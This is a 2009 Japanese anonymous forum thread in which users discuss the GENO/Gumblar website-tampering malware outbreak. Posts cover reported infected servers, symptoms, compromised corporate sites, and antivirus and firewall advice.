748:名無しさん@お腹いっぱい。
09/05/15 04:34:45
>>746
前のレスにも出てるけど
URLリンク(www3.atword.jp)
のサイトにかいてある
SAKURAインターネットさん
www1722.sakura.ne.jp
sv172.lolipop.jp
sv11.chicappa.jp
株式会社 PURENIC JAPAN さん
p09ns7.puretopure.jp
NTTコミュニケーションズさん
120.29.185.234(VPS-TOKYO2)
ニフティサーブ ネットワーク(ニフティ株式会社さん
61.121.100.119
の該当データの停止を行ってください。
何度Mail送っても反応無いので・・・・・
749:名無しさん@お腹いっぱい。
09/05/15 04:37:17
>>745
マジかよ
さっきオンラインスキャンやってきたばっかだぞorz
早く寝てしまいたい…
750:名無しさん@お腹いっぱい。
09/05/15 04:38:08
ニフティにアクセスしたらアウトなの?
751:名無しさん@お腹いっぱい。
09/05/15 04:38:45
ニフティのセキュリティ情報サイトさっき見たばかりなんd
752:名無しさん@お腹いっぱい。
09/05/15 04:39:44
マジでヤバイなこれw
753:名無しさん@お腹いっぱい。
09/05/15 04:39:58
ニフティ今朝アクセスしたばっかり・・・。うwぁああああああああああああああ
754:名無しさん@お腹いっぱい。
09/05/15 04:40:48
けどコマンドプロンプトもレジストリエディタも普通に立ち上がったぞ
IEの挙動もなんともない
CPU使用率もいたって普通
755:名無しさん@お腹いっぱい。
09/05/15 04:41:27
>>196
これって何をスキャンしたの?
ローカルに保存したファイルしかスキャンできないと思っていたんだけど、違うのか?
756:名無しさん@お腹いっぱい。
09/05/15 04:42:09
一気に感染拡大してるじゃん。しばらく安心してネット出来ないなこりゃ
757:名無しさん@お腹いっぱい。
09/05/15 04:44:31
ニフティマジかよスキャンするためにわざわざIEでJS有効にしたのに・・・
758:名無しさん@お腹いっぱい。
09/05/15 04:44:34
専ブラで2ch見るぶんには大丈夫だよね?
759:名無しさん@お腹いっぱい。
09/05/15 04:44:54
avast反応よさそうなのでインスコしたらBeckyでメール受信出来なくなった
アンインスコした
760:名無しさん@お腹いっぱい。
09/05/15 04:45:23
>>754
IEの挙動は元々おかしい(WinMeなので・・・)んだけど、
MS-DOSプロンプトとレジストリエディタは立ち上がった
一応、感染してないってことで良いのかな?
761:名無しさん@お腹いっぱい。
09/05/15 04:45:38
これて桜とかニフティでサーバーかりてる一部の感染じゃないの?
762:名無しさん@お腹いっぱい。
09/05/15 04:48:06
>>754
CPU使用率は元から100%な件・・・
763:名無しさん@お腹いっぱい。
09/05/15 04:48:39
ニフティなんてスキャンするために何度も行ってるが
764:名無しさん@お腹いっぱい。
09/05/15 04:50:17
もう疑心暗鬼になってるなw
よくあるパターンだw
765:名無しさん@お腹いっぱい。
09/05/15 04:52:57
怖くて再起動/シャットダウンできないwww
寝たいよー
766:名無しさん@お腹いっぱい。
09/05/15 04:53:58
ウインドウズアップデートしたら重すぎて怖い
767:名無しさん@お腹いっぱい。
09/05/15 04:54:39
>>765
休止はダメなのか
768:名無しさん@お腹いっぱい。
09/05/15 04:55:19
どうせサイトなんか持ってないし、挙動もおかしくないし、
(感染してるかどうかわかんないけど)騒動落ち着いてからOS入れなおそうかなw
何かもうアホらしくなってきたw
769:名無しさん@お腹いっぱい。
09/05/15 04:57:53
www.nifty.comとはIPアドレスが違うから落ち着け
770:名無しさん@お腹いっぱい。
09/05/15 05:00:09
あやしいURLを開こうとしたらウィルス対策ソフトって警告とか出ますかね
771:名無しさん@お腹いっぱい。
09/05/15 05:00:27
>>765
俺もシャットダウン&再起動できんわw
シャットダウンしたら最後、起動できなくなりそうでw
バックアップも取ってないし、終わったわ・・・
アダルトサイト見ていたわけでもないのに、何でウイルスに出くわすんだよ
772:名無しさん@お腹いっぱい。
09/05/15 05:01:47
>>770
俺はavastでページ開く前に警告出たんだけど、何故かウイルスチェストに移動できなくて
果たして感染防止できたのか、感染してしまったのか判断できずに困ってる・・・
773:名無しさん@お腹いっぱい。
09/05/15 05:02:57
>>772
挙動がおかしくなければ多分大丈夫
774:765
09/05/15 05:03:09
よっしゃ、勇気を出して(ヤケクソで)再起動したけど
またここに戻ってこれたよおおおおおお
>>769ありがとねw
775:名無しさん@お腹いっぱい。
09/05/15 05:03:35
>>772
まずはすぐに確認できるもの(regeditとか)だけ確認してみれば?
776:名無しさん@お腹いっぱい。
09/05/15 05:04:15
>>771
案外アダルトサイトの方がウイルス対策や改竄対策をしっかりやっていて却って安心だったりして。
777:名無しさん@お腹いっぱい。
09/05/15 05:05:08
これって感染したらすぐわかるもんなの?コマンドプロンプトやレジストリエディタなんて、普段はあんまり使わないし
特定のサイトに繋がらない、ブラウザが落ちるっていうのも何も知らない人だったら「ちょっと調子悪いなぁ」くらいにしか思わないんじゃ・・・。
778:名無しさん@お腹いっぱい。
09/05/15 05:06:33
これだけ広まってれば大々的な対策されるのも時間の問題だよな、流石に
そうであってほしい
779:名無しさん@お腹いっぱい。
09/05/15 05:06:45
>>773
Meのせいか、普段から挙動がおかしいので分からんw
>>775
とりあえず、MS-DOSプロンプトとregeditは起動できた
大丈夫なのかな?
>>776
それは言えてるw
意外とアダルトサイトってウイルスいないよねw
780:名無しさん@お腹いっぱい。
09/05/15 05:07:23
>>760
Meってとっくにセキュリティー関連の更新が終わっているんじゃないの?
脆弱性の検査もされずに放置され、トロイとかの餌食になってると思うけど。
持っていないから、詳しくは知らんけど。
781:名無しさん@お腹いっぱい。
09/05/15 05:07:40
Meは今んとこ感染報告ないからのう…
782:名無しさん@お腹いっぱい。
09/05/15 05:09:01
>>780
2,3年前にサービス停止したね
でも、俺のPCはMeがOSなので、仕方が無く使ってるわ・・・
一応、Meでもavast入れていれば大丈夫だよね?
今回も警告出てくれたし
783:名無しさん@お腹いっぱい。
09/05/15 05:09:42
GENOはどこからウィルスもらってきたわけ
784:名無しさん@お腹いっぱい。
09/05/15 05:09:55
>>782
いや例えこのウイルスはブロックできてもそれ以外で問題山積みだから
窓から投げ捨てて安物のネットブックでも買って来い
785:名無しさん@お腹いっぱい。
09/05/15 05:12:17
>>784
今日、電気屋に行って、PC物色して来たよ
OS(XP)がインストール済みのノートで5万5千くらいだったな
786:名無しさん@お腹いっぱい。
09/05/15 05:13:37
Meは古すぎる、つまりネット絡みが貧弱なので
落とされる脆弱性はあっても乗っ取られる要素は2000よりも少ないと何かで読んだことがある。
98SEからXPに移行したクチなのでMeは良く分からないな。
787:名無しさん@お腹いっぱい。
09/05/15 05:15:09
安いPCを探そうと思ったけど通販サイトや情報サイト覗くのが怖い件w
788:名無しさん@お腹いっぱい。
09/05/15 05:16:39
>>782
古いOS 脆弱性
でぐぐったら、トップにこれが出てきた。
熟読した方がいいと思う。
URLリンク(blog.hitachi-system.co.jp)
詳しくは知らないけど、MEを使ってるのは、AdobeReaderの9.10以前を使っているよりも危険だと思う。
avastがウィルスの侵入を食い止めてくれても、脆弱性をついた攻撃をガードできるわけじゃないはず。
そもそも、セキュリティーメーカー側からしたら、時系列が逆だし。
789:名無しさん@お腹いっぱい。
09/05/15 05:21:27
Windowsが狙われたとは言えmacを使う気になれないのはどうしてだろう。
790:名無しさん@お腹いっぱい。
09/05/15 05:23:22
このウィルスの話題って外じゃ全然でてこないけど
かなりやばくないか
791:名無しさん@お腹いっぱい。
09/05/15 05:27:01
2ch内でもそこまで騒ぎになってないよな
苺きんたまの時とかの方がみんな騒いでた
セキュリティソフトを過信して安心しきってるってことかな
792:名無しさん@お腹いっぱい。
09/05/15 05:27:59
>>790
大きい企業もやられているので圧力が・・・
個人情報も抜かれてるなんて知られた日には初心者はパニックになるよな。
793:名無しさん@お腹いっぱい。
09/05/15 05:32:54
4月の半ばになんかのサイト見ようとリンク押したら警告でたなぁ
もしかしたらこのウィルスかもしれん
794:名無しさん@お腹いっぱい。
09/05/15 05:44:18
アドビのサイト開こうとするとブラウザが固まる
FireFoxならいけたんだけど何でだ
795:名無しさん@お腹いっぱい。
09/05/15 05:47:15
小林製薬のサイトよく見てたから怖くなってきた…
796:名無しさん@お腹いっぱい。
09/05/15 06:58:25
61.121.100.119って
hXXp://homepage.nifty.com/
のサーバーのIPアドレスか?
797:名無しさん@お腹いっぱい。
09/05/15 07:01:28
なるほどwww.nifty.com行っても反応ないのか
798:名無しさん@お腹いっぱい。
09/05/15 07:03:38
見に行ったら表示されないなあ
799:名無しさん@お腹いっぱい。
09/05/15 07:08:42
再起動したけど、とりあえず普通に立ち上がったわ
CPU使用率も問題ないし、regeditも起動できた
感染してないってことでOK?
800:名無しさん@お腹いっぱい。
09/05/15 07:16:39
Nimdaは感染経路がいくつもあったからある意味「責任逃れ」ができたんだけど、
GENOウイルスはサイト管理者のPCが感染→そこからFTPを通してサイトが改ざん→
そのサイトにアクセスすることで感染、と経路(つまり責任)がはっきりしているから
「お前のせいで感染したんだ!どうしてくれる!」「怖いからもうそこでは買わない、
それどころかそのサイトに行きたくもない」と企業や個人の責任問題にされかねない
801:名無しさん@お腹いっぱい。
09/05/15 07:21:05
aguse.jpが全然役に立たない理由が↓見てわかったわ。
URLリンク(ilion.blog47.fc2.com)
jscript.dllのバージョンを調べて、本当にIEで表示してるのかを確認してるから、
UAを偽装してアクセスしても検出されないんだ。
スクリプトの難読化パターンも多いし、シグネチャベースの検知はかなり難しいね。
オンラインスキャンもほとんど無意味だし、avast入れておくのがいちばんかも。
とりあえずIEを使わないってだけでも、現時点では効果があるけど、改変版でも
大丈夫かどうかわからないし。
802:名無しさん@お腹いっぱい。
09/05/15 07:22:49
ノートン無反応か・・・早く対応すればいいのに
803:名無しさん@お腹いっぱい。
09/05/15 07:58:08
2009/5/14 22:39 - 小林製薬 (4967) は12日、同社のホームページが何者かによって改ざんされ、
ホームページにアクセスするとウィルスに感染するようになっていたとして、
ウィルス感染が判明したホームページを当面の間、閉鎖したことを発表した。
同社によると感染が明らかになったホームページは
「暮らしのヒントお知らせ隊(URLリンク(hint.kobayashi.co.jp))」「ハナノアブランドサイト(URLリンク(hint.kobayashi.co.jp))」
「イージーファイバーブランドサイト(URLリンク(hint.kobayashi.co.jp)) 」の3つ。
それぞれ、5月9日5時27分から5月11日21日27分までこれらのホームページにアクセスした人は、
ウィルスに感染した可能性があるとして、感染の有無を確認するように呼びかけている。
ウィルスに感染した場合、sqlsodbc.chmの改変、コマンドプロンプトが起動不能、レジストリエディタが起動不能などの症状が発生するとしている。
尚、同社ではMacとWindows Vistaに関してはこのウィルスには感染する恐れはないとも述べている。
URLリンク(www.technobahn.com)
804:名無しさん@お腹いっぱい。
09/05/15 08:00:29
>同社のホームページが何者かによって改ざんされ
805:名無しさん@お腹いっぱい。
09/05/15 08:07:57
aguseは、GENO祭りの真っ最中もまったく役立たずだったな。
何度調べさせてもセフセフ。
806:名無しさん@お腹いっぱい。
09/05/15 08:08:06
GDATA(avast)は対応済みか、、、後常にJSを切ってる人
807:名無しさん@お腹いっぱい。
09/05/15 08:12:09
↑見たらJSあっても無くても感染するのか。
808:名無しさん@お腹いっぱい。
09/05/15 08:14:06
フラッシュプレイヨー10って小数点以下の違いある?
アドビリーダー9.10と9.11みたいな違い。
809:名無しさん@お腹いっぱい。
09/05/15 08:15:49
違いがないのに数だけ増やしてると思ってるの?
810:名無しさん@お腹いっぱい。
09/05/15 08:15:59
>>805
zlkonやgumblarがアクセス制御かけて同じホストからの接続には
しばらく(?)無害になるのでサーバーサイドのチェッカの類はほぼ効かない
(初回は有害判定されるかもしれんけど、たぶんJScript.dllチェックで蹴られておしまい)。
NortonSafeWebもセーフ判定のまま。
811:名無しさん@お腹いっぱい。
09/05/15 08:26:25
>>803
確認して感染が見つかったらどう責任とってくれるんだよwww
812:名無しさん@お腹いっぱい。
09/05/15 08:27:17
>>803
>同社のホームページが何者かによって改ざんされ
w
813:名無しさん@お腹いっぱい。
09/05/15 08:29:28
GENOにくらべたら対応がいいほう
814:名無しさん@お腹いっぱい。
09/05/15 08:30:48
アンチウィルスのパターンファイルもアテにならないし、ヒューリスティック頼みだな。
そのヒューリスティックもAvast!以外は無力みたいだし、Avast!も亜種すべてに
反応するかわからんし、困ったもんだな。
JavaScriptの埋め込みによるリダイレクトじゃなくて、hrefタグを書き換えるような
形になってしまったらAvast!も反応しないんじゃないかな?
815:名無しさん@お腹いっぱい。
09/05/15 08:30:57
>>809
そうじゃなくて10にも種類があるのか知りたい。
前に10にしたけど知らない間に新しいの出てると困る。
816:名無しさん@お腹いっぱい。
09/05/15 08:33:42
>>815
FLASH バージョン でググって最新版か確認汁
817:名無しさん@お腹いっぱい。
09/05/15 08:34:08
>>815
Acrobat ReaderなりAcrobatなりを立ち上げて、ヘルプメニューの「アップデートの有無をチェック」
してみればいいよ。インストールされているAdobe製品全般のアップデート確認が行われるから。
818:名無しさん@お腹いっぱい。
09/05/15 08:35:54
>>809の突っ込み方はないわなw
819:名無しさん@お腹いっぱい。
09/05/15 08:36:58
>>817
それ、なぜかFlashは対象になってない気がする。Reader、Acrobat、PhotoShop等は
アップデートされるんだけどね。
820:名無しさん@お腹いっぱい。
09/05/15 08:41:05
まぁFlashPlayerはそれ単体で起動するものではなくブラウザから呼ばれる物だからね。
IEならFlash置いてあるサイト管理者がobjectタグにバージョン書いとけばそれ以下ならIEに更新を促される。
821:名無しさん@お腹いっぱい。
09/05/15 08:41:44
何が目的かわからんが、現在の最新版と今自分が使ってる版を確認したければここを開け
URLリンク(www.adobe.com)
822:名無しさん@お腹いっぱい。
09/05/15 08:42:49
>>819
Flashはここで見れるよ
823:名無しさん@お腹いっぱい。
09/05/15 08:43:12
>>814
やっぱ、avastって凄いのか?
824:822
09/05/15 08:43:37
貼り忘れた org
URLリンク(www.adobe.com)
825:822
09/05/15 08:44:18
orz (^^;
826:名無しさん@お腹いっぱい。
09/05/15 08:46:12
有料のノートンとかバスターより無料のavastが凄いとか、どういうことよ?
827:名無しさん@お腹いっぱい。
09/05/15 08:46:18
JAVAスクリプトのソースに、ノートンのオートプロテクトは反応しないのか
828:名無しさん@お腹いっぱい。
09/05/15 08:48:29
>>823
Genoに関してはね。
過剰に反応することも多いし、FWやアンチスパイウェアとも組み合わせなければ
いけないから、PCにあまり詳しくない人には勧めにくいんだよな。
家族が使ってるPCのセキュリティソフト、どうすっかな。
829:名無しさん@お腹いっぱい。
09/05/15 08:48:48
バスターは元々無料のより使えないけどな
830:名無しさん@お腹いっぱい。
09/05/15 08:50:45
>>827
しないね。難読化パターンがいろいろあるし。
831:名無しさん@お腹いっぱい。
09/05/15 08:52:42
このウイルスの怖さを周りや上司にいっても
「ふーん」で終わって、ちゃんとupdateの確認さえしたかも怪しい。。
これが普通なのかな、ちゃんと説明した自分が空しい。。
832:名無しさん@お腹いっぱい。
09/05/15 09:00:41
>>828
俺、avast単独で使ってるんだけどダメなのか?
833:名無しさん@お腹いっぱい。
09/05/15 09:02:47
俺のところも、前回のラトビアの規制だけして、adobeのバージョンアップはなし。
業務に影響を及ぼしうるadobeのバージョンアップは許可できないんだそうでw
業務用バスターw入れてるから大丈夫とか、もうアボガドバナナと。
834:名無しさん@お腹いっぱい。
09/05/15 09:04:04
>>815
URLリンク(www.adobe.com)
日本のサイトはアップデートが遅い。
最新じゃないのに、最新といってくる。
>>832
FWは入れたほうがいいのでは?
コマンドプロンプトやレジストリ起動不可能っていう情報も、ミスリードさせるSE攻撃かもな。
835:名無しさん@お腹いっぱい。
09/05/15 09:05:13
>>832
FWはルータの内側で使ってるならなくてもいいかもね。
Avast!単体だとマルウェアやスパイウェアの類はスルーされる可能性があるから
入れておいた方がいいと思う。
836:名無しさん@お腹いっぱい。
09/05/15 09:06:58
Avast+UAC+WindowsFWが手軽でわりと安全
837:名無しさん@お腹いっぱい。
09/05/15 09:16:44
>>835
ルータ(ホームゲートウェイ)の内側で使用してるわ
FW(ファイアウォール)って、ルータとかで外部のインターネットと
隔絶されている環境(LANとか)ならもう入っているんでしょ?
838:名無しさん@お腹いっぱい。
09/05/15 09:22:49
>>837
ルータにはポート、プロトコルベースのFW機能はあるけど、自分で設定しなければ
ザルだよ。標準状態ではTeredoが通過しちゃうものも多いし。
839:名無しさん@お腹いっぱい。
09/05/15 09:29:49
本物のウィルスより怖いわ
バックアップとっておくかな
840:名無しさん@お腹いっぱい。
09/05/15 09:35:07
IDがでないから、誰が何を書いているのか分からんな。
>>837
使っているOSは?
ルーターが仮に100パーセント外部からの攻撃は防げたとしても、
内側からのリクエストはスルーするからね。
ブラウザでリンク先をクリックすれば、
ルータに遮断されずに次のページの(外部)情報がローカルに戻ってくるのと同じ方法で
悪さをされないともいえない。
PCに入ったマルウェアが外部に情報を送ったりってのを防げる確立が減る。
FW入れてても、IEとかに偽装されて通信されるんだから、入れたほうが良いよ。
フリー HIPS Firewall OR ファイアーウォール
でググルんだ。
841:名無しさん@お腹いっぱい。
09/05/15 09:40:50
>>840
OSはWinMe
FWってルーターの内側でも別個に入れておかないとダメなもんなの?
俺はavast入れておいたから、もう大丈夫だと思ってたよ
セキュリティソフトってファイアウォールの役割もあるんじゃないの?
842:名無しさん@お腹いっぱい。
09/05/15 09:42:12
Meなんか捨てろ
843:名無しさん@お腹いっぱい。
09/05/15 09:56:02
>>842
2004年に中古PCを買ったとき、プリインストールされていたんだよ
まだ5年しか使ってないんだぞ?ネットゲームとかしない限りは、普通に
ブラウザでHPも閲覧できるし・・・特に問題はないんだが
たった、5年で捨てるとか、買い換えるとか、車とかTV,冷蔵庫じゃありえん
844:名無しさん@お腹いっぱい。
09/05/15 09:57:16
知り合いは言っても無駄だから全部人柱、観察対象でオケ。
845:613
09/05/15 09:57:37
>>614-615
ありがとう、調べてみる
846:840
09/05/15 09:57:41
>>841
>FWってルーターの内側でも別個に入れておかないとダメなもんなの?
だから、入れておかないとダメって言ってるじゃん。
>>779と同じ人?
はっきり言って、君のような人がボットネットやマルウェア拡散の踏み台になっているんだよ。
>>779-788
は読んだ?
avastはFW入ってないでしょ?
ウィルス対策とファイアーウォールは別。
ノートンとかウィルスバスターはFWも統合されているけど、ウィルス対策だけを抜き出している製品もある。
avastは抜き出された方と同種であり、セキュリティーの一部を担っているだけ。
ルーターも初期設定で使ってそうだな。 ルーターだと思っていたが、実はモデムだったってオチすらありそうだ。
847:名無しさん@お腹いっぱい。
09/05/15 10:01:21
何か色々あったが3日で直った、多分このウイルスの現象
1、とりあえずIEが満足に使用できなくなる
IEの再インストール?上書き?でとりあえず直る
2、公式ログイン制のオンラインゲームが起動しなくなる
どうやらパスワードの認識が通らなくなる様子、何故通らなくなるのかは知らん
avastのアップデートが出来なかったり、エアーステーションに接続できなくなったり等
3、cmdが使えなくなる、色々方法を探してたときに気づいた
結局cmdは使ってないけどな、復元ポイント早速作っておいたわ
とりあえずスパイウェア削除してavast起動したらシステムメモリ内にウイルス混入してたっぽく
再起動後にスキャンするとか言うのをやったら直ったっぽい